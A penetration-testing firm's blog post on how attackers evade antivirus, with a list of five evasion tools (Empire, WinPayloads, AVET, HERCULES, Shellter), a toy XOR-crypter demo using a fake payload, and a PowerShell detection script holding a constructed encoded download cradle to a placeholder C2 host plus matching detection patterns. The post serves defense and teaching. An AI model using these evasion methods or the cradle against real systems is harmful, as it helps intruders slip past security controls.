Antivirus software is one of the oldest and most ubiquitous security controls against malware. Historically it focused on blocking viruses, then evolved to cover all sorts of other malicious software. “I have antivirus, so I’m covered” used to carry some legitimate weight. Lately, however, attacks have grown more sophisticated: they stay under the radar by abusing legitimate administrative tooling that is already on the host and by evading virus signatures, which undermines a formerly effective standalone control. At this point, signature-based antivirus has been outpaced by endpoint detection and response technology that is behavioral in nature and detonates suspicious files in virtualized sandboxes.
NopSec’s roots go back to penetration testing (ethical hacking), and to this day we are always looking for tools and techniques that help our penetration testers and security engineers develop ways for our customers to mitigate these attacks. This blog post explores how attackers evade a standard security control, antivirus software, and gives you tips on what to do should you become a victim.
Exploitation and Privilege Escalation
Here’s the typical process used by attackers in exploitation and privilege escalation:
- Find an open port and running service
- Determine that the service has a vulnerability
- Determine whether that vulnerability has an exploit available
A quick word on the difference between script kiddies and l33t hackers:
<For Scriptkiddies>:
Use Metasploit to pair the exploit with an available payload (for example, a reverse Meterpreter shell), and hope for the best that the target does not run an antivirus or endpoint security tool!
<For L33t hackers>:
Create a payload that bypasses antivirus through obfuscation, encryption or signature evasion (a brand-new payload or shellcode that no signature matches).
Antivirus Evasion Techniques
Here are three substantial techniques for evading antivirus detection:
- Writing a new payload or shellcode whose signature is not present in the antivirus database. This is effective against signature-based products, but it falls short against newer solutions that base their detection on heuristics and behavioral analysis, because the behavior of the new payload is the same as the old one.
- Obfuscating (reversible) or encrypting the payload on disk so that it is only decoded at runtime, on the fly, and injected directly into memory. The file a signature scanner sees never contains the known bytes; only the running process does.
- Building payloads on tools and frameworks the OS already ships, such as PowerShell on Windows and Python on Linux (or on Windows hosts where it is installed). The interpreter is trusted and signed, so only the script content is left to detect.
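To make the second technique concrete, here is an added example (written for this post, not code from any of the tools listed below). It runs a toy signature scanner over a payload stored plain, over the same payload XOR-encoded the way a crypter stub would write it to disk, and over the bytes the stub restores in memory at runtime. The "payload" and the "signature" are constructed stand-ins, not real shellcode or a real AV database entry, and the XOR key is an arbitrary assumption.

```python
"""Why a static signature misses an encoded payload but a behavioral/sandbox
engine, which sees the decoded bytes, does not. Added example; the payload,
signature and key below are constructed for illustration only."""

# Constructed stand-in for a payload. Real shellcode would go here; this is
# just a recognizable byte string so the matching logic can be exercised.
PAYLOAD = b"\x90\x90FAKE-METERPRETER-STAGER\x90\x90"

# Constructed stand-in for an AV signature database: byte pattern -> name.
SIGNATURES = {
    b"FAKE-METERPRETER-STAGER": "Trojan.Constructed.Stager",
}


def scan(blob: bytes) -> list:
    """Minimal signature engine: report every signature found in blob."""
    return [name for pat, name in SIGNATURES.items() if pat in blob]


def xor_encode(data: bytes, key: bytes) -> bytes:
    """Symmetric XOR with a repeating key; applying it twice restores the input.
    A key byte of 0x00 would leave the corresponding payload byte unchanged,
    so a real crypter avoids zero bytes in the key."""
    if not key:
        raise ValueError("key must not be empty")
    if b"\x00" in key:
        raise ValueError("key must not contain zero bytes")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def build_stub(payload: bytes, key: bytes) -> tuple:
    """What a packer/crypter writes to disk: the key and the encoded payload.
    Nothing on disk contains the signature bytes."""
    return key, xor_encode(payload, key)


def run_stub(key: bytes, encoded: bytes) -> bytes:
    """Runtime side: decode in memory just before use. A real loader would now
    copy the result into executable memory; here the bytes are only returned
    so the behavior can be checked."""
    return xor_encode(encoded, key)


def demo(key: bytes = b"\x5a\xa5\x3c") -> dict:
    """Scan all three views of the payload and report what each one catches."""
    on_disk_key, on_disk_blob = build_stub(PAYLOAD, key)
    in_memory = run_stub(on_disk_key, on_disk_blob)
    return {
        "plain_hits": scan(PAYLOAD),        # file-based scan of the raw payload
        "encoded_hits": scan(on_disk_blob), # file-based scan of the crypter output
        "decoded_hits": scan(in_memory),    # what a memory scan / sandbox sees
        "roundtrip_ok": in_memory == PAYLOAD,
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v}")
```

The encoded file scans clean while the decoded bytes in memory still match, which is exactly why the post's later advice favors behavioral and detonation-based endpoint products over file signatures alone: they observe the payload after the stub has undone its own encoding.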
The tools presented below use one or a combination of the evasion techniques above. Here are our top 5 tools!
Tool #1: Obfuscated Empire
- Integration of two projects: Invoke-Obfuscation and Powershell Empire
- Empire uses a PowerShell implant whose C2 channel runs entirely in memory and never touches disk. Even so, the unobfuscated launcher and modules are well known, so in its original form Empire trips many signature-based alarms.
- Invoke-Obfuscation applies various types of obfuscation to PowerShell scripts, which defeats those signatures.
- Launchers gained Obfuscate and ObfuscateCommand options. Simply set the Obfuscate flag to True, and optionally configure the Invoke-Obfuscation ObfuscateCommand to be used.
- With the global Obfuscate flag set to True, Empire obfuscates the entire agent-negotiation process as well as its PowerShell modules.
Do you want to see a live demo of Obfuscated Empire being used? If so, click here.
Tool #2: WinPayloads
- Windows payload generation (marketed as “undetectable”) with extras, running on Python 2.7
- UACBypass – PowerShellEmpire
- PowerUp – PowerShellEmpire
- Invoke-Shellcode
- Invoke-Mimikatz
- Invoke-EventVwrBypass
- Persistence
- Psexec Spray
- Upload to local webserver
- Powershell stager – allows invoking payloads in memory & more
Tool #3: AVET – Antivirus Evasion Tool
- An exe generated directly by msfvenom is recognized and blocked by antivirus
- AVET is an antivirus evasion tool targeting Windows machines; its output is an executable file
- Assembly shellcodes can be used and shellcode can be generated with msfvenom or other means
- make_avet can be used for configuring the source code
- It can load ASCII-encoded shellcode from a text file or from a web server, and it includes an AV evasion technique that avoids sandboxing and emulation
- Automation script and a Python wizard for automating commands
Tool #4: HERCULES – Payload Generator
- HERCULES generates various Meterpreter payloads and a custom HERCULES payload
- Each payload is packed with UPX (note that UPX is a well-known packer that most engines unpack statically, so on its own it adds little evasion)
- It can add persistence and migration to a specific process
Tool #5: SHELLTER PRO
- Shellter is a dynamic shellcode injection tool
- It can be used to inject shellcode into native Windows applications
- Compatible with Windows x86/x64 (XP SP3 and above) & Wine/CrossOver for Linux/Mac.
- Supports any 32-bit payload (generated either by metasploit or custom ones by the user).
- Stealth Mode – Preserves Original Functionality.
- Multi-Payload PE infection.
- Proprietary Encoding + User Defined Encoding Sequence.
- Supports Reflective DLL loaders.
- Embedded MSF Payloads.
- Junk code Polymorphic engine.
- <PRO> Dynamic Payload Injection In DLLs
- <PRO> Multi-Payload Chaining
- <PRO> More MSF-compatible built-in payloads
How to Stay Secure if Antivirus is Bypassed
What do you do in the unfortunate event that your antivirus control is bypassed? Here are some tips from our security team:
- Deploy layered security controls (defense in depth), so that no single product is the only thing standing between an attacker and your data
- Install endpoint detection and response solutions that look at process behavior rather than file signatures: antivirus isn’t enough anymore
- Enforce strict egress filtering on your firewall so that reverse shells and C2 channels cannot call back out
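Behavioral detection is what makes the second tip work against the PowerShell-based launchers discussed above. The following is an added example (written for this post, not a rule from any vendor or from Empire): a small check of the kind an endpoint product runs, applied to constructed process-creation events. The event fields imitate a Sysmon-style record, the download cradle and host name are invented, and the encoded launcher is built at runtime from that invented text; none of it is real telemetry.

```python
"""Behavioral triage of PowerShell process-creation events: hidden window,
encoded command, and a download cradle that only appears once the
-EncodedCommand argument is decoded. Added example with constructed data."""
import base64
import binascii
import re

# Constructed cradle standing in for an Empire-style launcher. The host is a
# reserved example name, not a real C2 server.
CRADLE = ("IEX (New-Object Net.WebClient)"
          ".DownloadString('http://c2.example.invalid/launcher')")
# PowerShell expects -EncodedCommand to be base64 of UTF-16LE text.
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

# Constructed process-creation events (Sysmon Event ID 1-like fields, invented).
EVENTS = [
    {"id": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoLogo -File C:\Scripts\inventory.ps1"},
    {"id": 2, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -noP -sta -w 1 -enc " + ENCODED},
    {"id": 3, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": r"notepad.exe C:\Users\alice\notes.txt"},
]

HIDDEN_WINDOW = re.compile(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", re.I)
ENCODED_CMD = re.compile(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"Net\.WebClient|DownloadString|DownloadFile|Invoke-Expression|\bIEX\b|FromBase64String",
    re.I)


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE text behind -e/-enc/-EncodedCommand, or None."""
    m = ENCODED_CMD.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except (binascii.Error, ValueError):
        return None  # malformed base64: PowerShell would reject it as well
    return raw.decode("utf-16-le", errors="replace")


def analyze(event: dict) -> list:
    """Behavioral indicators for one event; an empty list means nothing flagged."""
    reasons = []
    image = event["Image"].lower()
    cmd = event["CommandLine"]
    if not image.endswith(("powershell.exe", "pwsh.exe")):
        return reasons
    if HIDDEN_WINDOW.search(cmd):
        reasons.append("hidden window")
    decoded = decode_encoded_command(cmd)
    if decoded is not None:
        reasons.append("encoded command")
        # A signature on the launcher text never sees the cradle; decoding
        # first restores what the interpreter will actually run.
        if DOWNLOAD_CRADLE.search(decoded):
            reasons.append("download cradle in decoded command")
    elif DOWNLOAD_CRADLE.search(cmd):
        reasons.append("download cradle on command line")
    return reasons


def triage(events=EVENTS) -> dict:
    """Map each event id to the list of reasons it was flagged."""
    return {e["id"]: analyze(e) for e in events}


if __name__ == "__main__":
    for event_id, reasons in triage().items():
        print(event_id, reasons or "clean")
```

The point of decoding before matching is that obfuscation and encoding only change what is written on disk or on the command line; the interpreter still has to see the real instructions, and a control that looks at the same view the interpreter sees is not fooled by the transformation. Pairing a check like this with egress filtering means that even a launcher that slips past it cannot reach its C2 host.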
To watch the full on-demand webcast featuring NopSec CTO, Michelangelo Sidagni, go here.
To learn more about NopSec’s expert Penetration Testing and other cybersecurity services, please visit nopsec.com/services or call us at 646-502-7900.